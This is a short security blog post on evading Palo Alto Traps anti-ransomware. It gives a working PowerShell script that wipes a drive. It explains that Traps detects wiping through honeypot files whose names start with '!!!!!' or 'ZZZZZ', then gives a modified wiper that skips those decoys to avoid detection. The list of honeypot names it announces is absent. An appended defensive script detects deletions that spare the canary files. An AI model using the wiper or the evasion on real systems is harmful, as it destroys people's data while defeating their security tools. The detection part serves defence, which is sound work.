Evading Palo Alto Traps Anti-Ransomware Protection


This piece could be the shortest article you have/will read today, so don’t blink:

The PoC script below mimics ransomware: it wipes the whole D: drive except the pre-excluded files and folders ($TrustedFiles and $TrustedFolders).
When this script runs, Traps (version 4.1.0 and above, with the Anti-Ransomware module activated) flags it as ransomware and kills the process, because it performs bulk file/folder modification:

# Wipe everything on the D: drive except the trusted files and folders listed here
$basePath='d:\'
$TrustedFiles='SomeFile.csv'
$TrustedFolders='SomeFolder','SomeOtherFolder','$RECYCLE.BIN','System Volume Information'

# Delete every top-level folder that is not in the trusted list
foreach ($FolderCheck in (Get-ChildItem $basePath | ?{ $_.PSIsContainer })){

	$folderToCheck = $FolderCheck.name
	$deletefolder = 1
	foreach ($Fol in $TrustedFolders){
		if ($Fol -eq $folderToCheck){
			$deletefolder = 0
		}
	}

	if($deletefolder){
		$fullPath=$basePath+$folderToCheck
		remove-item $fullPath -recurse
	}

}

# Delete every top-level file that is not in the trusted list
foreach ($FileCheck in (Get-ChildItem $basePath | ?{ !$_.PSIsContainer })){

	$fileToCheck = $FileCheck.name
	$deletefile = 1
	foreach ($Fil in $TrustedFiles){
		if ($Fil -eq $fileToCheck){
			$deletefile = 0
		}
	}

	if($deletefile){
		$fullPath=$basePath+$fileToCheck
		remove-item $fullPath
	}

}

So how does Traps detect that?
Simply: it creates honeypot files in all directories, with names like !!!!!2686401769.jpg and ZZZZZ1920832159.png.
Below is the list of all the file names:

So we edit our PoC script to exclude everything that starts with !!!!! or ZZZZZ, and it just works: Traps marks it as a benign process:

# Same wiper as above, but it leaves Traps' honeypot files alone
$basePath='d:\'
$TrustedFiles='SomeFile.csv'
$TrustedFolders='SomeFolder','SomeOtherFolder','$RECYCLE.BIN','System Volume Information'

# Delete every top-level folder that is not in the trusted list
foreach ($FolderCheck in (Get-ChildItem $basePath | ?{ $_.PSIsContainer })){

	$folderToCheck = $FolderCheck.name
	$deletefolder = 1
	foreach ($Fol in $TrustedFolders){
		if ($Fol -eq $folderToCheck){
			$deletefolder = 0
		}
	}

	if($deletefolder){
		$fullPath=$basePath+$folderToCheck
		remove-item $fullPath -recurse
	}

}

# Delete every top-level file that is neither trusted nor a honeypot
# (honeypot names start with ZZZZZ or !!!!!)
foreach ($FileCheck in (Get-ChildItem $basePath | ?{ !$_.PSIsContainer })){

	$fileToCheck = $FileCheck.name
	$deletefile = 1
	foreach ($Fil in $TrustedFiles){
		if (($Fil -eq $fileToCheck) -or ($fileToCheck -match "^ZZZZZ") -or ($fileToCheck -match "^!!!!!")){
			$deletefile = 0
		}
	}

	if($deletefile){
		$fullPath=$basePath+$fileToCheck
		remove-item $fullPath
	}

}

Is it that easy or is there something I’m missing?
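The weakness above cuts both ways: a wiper that skips the decoys by name leaves a pattern a defender can look for. As an added example, not code from the original post or from Traps, the PowerShell below snapshots a drive twice and flags directories where ordinary files disappeared while every canary file survived. The canary prefixes are the ones quoted above; $basePath, the function names and the 50% loss threshold are this example's own assumptions.

```powershell
# Added example, not part of the original post or of Traps itself.
# Canary prefixes are the ones quoted in the post; everything else here is assumed.
$basePath = 'd:\'
$CanaryPattern = '^(!!!!!|ZZZZZ)'

# Record, per directory, how many canary files and how many ordinary files it holds
function Get-DirectorySnapshot {
    param([string]$Root)
    $snapshot = @{}
    $dirs = @(Get-Item $Root) + @(Get-ChildItem $Root -Directory -Recurse -ErrorAction SilentlyContinue)
    foreach ($dir in $dirs) {
        $files = @(Get-ChildItem $dir.FullName -File -ErrorAction SilentlyContinue)
        $snapshot[$dir.FullName] = [pscustomobject]@{
            Canary = @($files | Where-Object { $_.Name -match $CanaryPattern }).Count
            Other  = @($files | Where-Object { $_.Name -notmatch $CanaryPattern }).Count
        }
    }
    return $snapshot
}

# Compare two snapshots and report directories whose ordinary files were
# (mostly) removed while every canary file is still in place: a wiper that
# deletes around the decoys leaves exactly this pattern behind.
function Compare-CanarySurvival {
    param([hashtable]$Before, [hashtable]$After, [double]$LossRatio = 0.5)
    $alerts = @()
    foreach ($dir in $Before.Keys) {
        if (-not $After.ContainsKey($dir)) { continue }  # whole directory removed: not decoy-aware
        $b = $Before[$dir]; $a = $After[$dir]
        $lost = $b.Other - $a.Other
        if ($b.Canary -gt 0 -and $a.Canary -eq $b.Canary -and
            $lost -gt 0 -and $lost -ge ($b.Other * $LossRatio)) {
            $alerts += [pscustomobject]@{
                Directory      = $dir
                FilesLost      = $lost
                CanariesIntact = $a.Canary
            }
        }
    }
    return $alerts
}

# Usage: take a baseline, wait, compare
$before = Get-DirectorySnapshot $basePath
Start-Sleep -Seconds 60
$after  = Get-DirectorySnapshot $basePath
Compare-CanarySurvival $before $after | Format-Table -AutoSize
```

Run against the post's second script, the D:\ root shows up with its trusted file surviving, its other files gone and both canaries intact, while the recursively deleted folders are skipped because they no longer exist.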
